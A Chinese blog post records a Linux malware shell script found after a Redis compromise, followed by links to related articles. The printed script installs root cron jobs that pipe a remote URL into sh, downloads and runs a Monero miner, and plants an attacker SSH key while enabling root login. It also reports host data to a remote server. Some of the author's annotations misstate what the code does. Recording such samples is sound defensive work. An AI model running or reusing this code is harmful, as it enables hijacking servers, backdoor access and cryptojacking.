linux下的一个病毒脚本,网上资料较少,记录以供参考

最新推荐文章于 2025-05-18 16:16:54 发布
最新推荐文章于 2025-05-18 16:16:54 发布
阅读量5.5k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Linux学习 文章标签: 病毒 redis 脚本 linux 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wsws1996/article/details/51722303
本文介绍了一种利用Redis提权漏洞植入恶意脚本的方法。通过设置定时任务执行远程下载的挖矿程序,并修改SSH配置以增强系统安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

谷歌得到参考 http://www.cnblogs.com/red-code/p/5599393.html,由redis提权漏洞导致

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
--清除并重设root的定时任务
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root 
--清除并重设root的定时任务
# echo "*/2 * * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr" >> /var/spool/cron/root 
--清除并重设root的定时任务
echo "*/5 * * * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &" >> /var/spool/cron/root 
 
# ps auxf | grep -v grep | grep "159.203.225.50" && pkill yam
--删除/opt/yam/yam
ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr & 
--删除/root/.ssh下的所有文件
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
--    修改PermitRootLogin 为 no,RSAAuthentication 为no,PubkeyAuthentication为no,在/etc/ssh/sshd_config删除AuthorizedKeysFile .ssh/KHK75NEOiq,重启sshd服务
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
 
--删除/opt/yam/yam
if [ ! -f "/opt/yam/yam" ]; then
    mkdir -p /opt/yam
    curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
    chmod +x /opt/yam/yam
    # /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr
fi
--删除/opt/gg3lady
if [ ! -f "/opt/gg3lady" ]; then
    curl -f -L https://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady
    chmod +x /opt/gg3lady
fi
 
# yam=$(ps auxf | grep yam | grep -v grep | wc -l)
# gg3lady=$(ps auxf | grep gg3lady | grep -v grep | wc -l)
# cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
 
# curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname -i`
手工搭建简易的Linux恶意脚本分析系统
安全杂货铺
08-21 838
概述 Linux环境下的恶意软件大部分以shell脚本作为母体文件进行传播,而且,同一个病毒家族所使用的的恶意脚本往往具有极高相似性,新变种的脚本大部分是在旧变种脚本的基础上进行修改,新增或替换部分关键恶意代码,同时,不同家族之间的恶意脚本也可能出现代码互相借鉴,部分重合的情况。 该如何揭示病毒家族中恶意脚本之间的关系呢?接下来,我们就通过手工搭建一个简易的恶意脚本分析系统,来实现对恶意脚本之间关系的研究。 系统的功能如下,主要为3个: [1] 使用yara检测脚本对应的病毒家族。 [2] 计算脚本与样本库
Linux病毒研究与分析
Go With Heart的专栏
08-05 4598
前言: 在我们日常生活中早就对windows中的病毒习惯了,对付windows中的病毒。我们有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 随着网络的发展,很多企业痘使用了Linux操作系统,原因主要是Linux的安全性比较高,但是Linux也会感染病毒。本文会对Linux病毒原理和如何防范做初步的介绍。 一、 Linux病毒史 1996年:破解组织V
linux脚本(shell)——输入密码脚本和怎么写病毒流氓脚本的思路
m0_48638643的博客
03-19 1612
编写这三个脚本,以及编写脚本的几个难点,统计变量的长度、使用正则去匹配、如何使用awk命令
[Linux]安装吧!我的软件包管理器!
jk23728的博客
05-18 489
Linux 下安装软件,通常的办法是下载程序的源代码,在自己机子上编译来得到可执行程序。但是这样做有些麻烦,于是就有人把一些常用的软件提前编译好,做成软件包放在一个服务器上,我们通过包管理器可以很方便的获取到这个软件包,直接进行安装。软件包和软件包管理器,就好像手机上的 "app" 和 "应用商店" 间的关系。yum (Yellow Dog Updater, Modified) 是 Linux 下非常常用的一个包管理器,主要应用在 Fedora、RedHat、Centos 等发行版上。
恶意代码之LINUX病毒技术
qq_63179750的博客
04-25 840
恶意代码之LINUX病毒技术
Linux病毒
袁萌专栏
07-18 8526
<!-- @page { size: 21cm 29.7cm; margin: 2cm } P { margin-bottom: 0.21cm } -->     近年来,Linux计算机流行起来了。按照某些人的说法,所谓“Linux病毒”自然要出来兴风作浪,祸害人们。所以,有关“Linux病毒”的知识有必要普及一下,以免谬见泛滥,混淆视听。
病毒测试代码
weixin_33964094的博客
09-27 959
--------我是分割线,不要复制我,复制我下面的代码------------------------------------ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* --------我也是分割线,不要复制我,复制我上面的代码------------------------...
linux下防病毒策略
06-18
for Linux/Unix Servers,该软件运行在命令行下,占用系统资源较少;工作站用户可以选择avast! Linux Home Edition,可在任何X-Windows环境下运行。 2. **后门程序防范**:针对后门程序,可以使用LIDS(Linux ...
Linux系统服务器防病毒实战.docx
09-26
for Linux/Unix Servers 它是工作在命令行下的,运行时可以较少占用系统资源。 3. 工作站用户可以选择 avast! Linux Home Edition,可以运行在任何 X-Windows 环境下面,比如 KDE 或 Gnome 等。 4. 对于后门程序...
Linux系统的防毒心得电脑资料.doc
最新发布
07-15
Linux系统的防毒心得电脑资料主要包括以下几个方面:一、Linux病毒的类型和特点,包括Ramen病毒、Lion病毒、OSF.8759、Slapper、Scalper、Unux.Svat和BoxPoison等。这些病毒各有不同的传播方式和危害,如Ramen病毒...
分享北大青鸟linux病毒解决方法.pdf
10-02
Linux病毒虽然相对较少,但随着Linux用户数量的增长和更多系统接入网络,潜在风险也在增加。因此,了解并防范Linux病毒至关重要。 防范Linux病毒的方法主要有以下几点: 1. 对于感染ELF格式文件的病毒,如Lindose...
linux下的文件感染病毒
12-16
本代码是我们小组仿照ELF文件感染病毒写的linux下的C文件感染病毒,可以指定目录下感染,并且提供了杀毒过程。
SHELL病毒简介
HexBug
09-12 2340
SHELL病毒简介Author: watercloudEmail: watercloud@xfocus.orgHomepage:http://watercloud_at_xfocus.org SHELL病毒简介1. 前言说起病毒总有点神秘的味道,想起以前用汇编编写第一个dos病毒时是那么的痛苦从开始有设想到完成花了3个多月,而且写的也是乱七八糟,最近突发奇想
linux病毒 (LPV)
weixin_34368949的博客
07-01 466
---------感染技术text 段感染,同会时自我复制---------//=免责声明=此代码纯粹是为了学习,非法使用与作者无关!!!此代码纯粹是为了学习,非法使用与作者无关!!!此代码纯粹是为了学习,非法使用与作者无关!!!此代码纯粹是为了学习,非法使用与作者无关!!!此代码纯粹是为了学习,非法使用与作者无关!!!此代码纯粹是为了学习,非法使用与作者无关!!! //在ELF可执行文件内的UN...
linux 病毒脚本,解析常见的Linux病毒
weixin_29157493的博客
05-02 541
Linux的用户也许听说甚至遇到过一些Linux病毒,这些Linux病毒的原理和发作症状各不相同,所以采取的防范方法也各不相同。为了更好地防范Linux病毒,我们先对已知的一些Linux病毒进行分类。从目前出现的Linux病毒来看,可以归纳到以下几个病毒类型中去:1、感染ELF格式文件的病毒这类病毒以ELF格式的文件为主要感染目标,通过汇编或者C可以写出能感染ELF文件的病毒。Lindose病毒就...
Linux系统下用shell脚本病毒感染其它linux脚本程序
C/C++攻城狮
09-12 3686
1.前言这篇文章算是通过学习网上其它几篇关于shell脚本病毒文章后自己写的学习心得,通过写这篇文章让自己能够加深理解一下相关知识。但是其实下面用到的shell脚本病毒的现实意义不大,但是对于理解病毒传播的机制有一定的作用,仅作为参考而已。2.脚本代码及感染步骤1)首先建立一个空文件,命名以.sh结尾,例如:virus.sh。然后打开该文件输入如下代码:#!/bin/bash #B:<+!a%C&t
linux c恶意代码,攻击者如何向正在运行的Linux进程注入恶意代码
weixin_29337389的博客
05-13 853
概述目前,已经有很多详细的技术文章,讲解攻击者是如何将被感染的文件注入到二进制代码中,以便下次启动受感染的程序时执行恶意代码。但是,针对正在运行的进程,攻击者可以采取什么方式实现感染呢?本文将主要介绍攻击者如何在内存中向正在运行的进程实现注入,换而言之,本文主要介绍如何编写自己的调试器。相关研究成果在展开细节之前,我们首先介绍一些相关的基础知识和研究成果。我们的第一个示例与恶意软件无关,而是一个多...
脚本/宏病毒
flowerxxxxx的博客
06-30 816
一旦发现计算机Office软件打开后弹出系统警告框,并且无法“另存为”,就表示该文件已感染宏病毒,此时不能再打开其他文件,否则病毒也会感染,应马上关闭删除该文件。(3)用Win Hex分别打开notepad.exe和notepad_upx.exe文件(2分),再比较PE头部分,用语言描述有什么不同。在“受信任位置”中,删除“可靠来源”列表框中的不安全来源,根据实际情况设置是否信任所有安装的加载项和模板,设置宏的安全性;(3)描述清除病毒及加固的方法;(注:直接答在该题下面)(5分)
shell 病毒简介
中國壹石頭
12-02 310
1. 前言   说起病毒总有点神秘的味道,想起以前用汇编编写第一个dos病毒时是那么的痛苦从开始有设想到完成花了3个多月,而且写的也是乱七八糟,最近突发奇想不就是感染其他文件,传播自己吗,用shell写一个病毒且不是非常简单,于是顺手写了如下这么一个脚本,功能就是感染其他shell程序。   这个程序在现实意义不大,但对于形象的理解病毒传播机制还是很很有帮助,可以算教学意义大于实际意义吧...
Linux系统Shell病毒技术详解
5. **杀毒软件**:虽然Linux系统上杀毒软件相对较少,但仍有可用的解决方案。 6. **用户教育**:教育用户不要随意执行不明来源的脚本。 总结,Linux系统虽然相对安全,但并不意味着完全免疫病毒攻击。了解Shell病毒...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值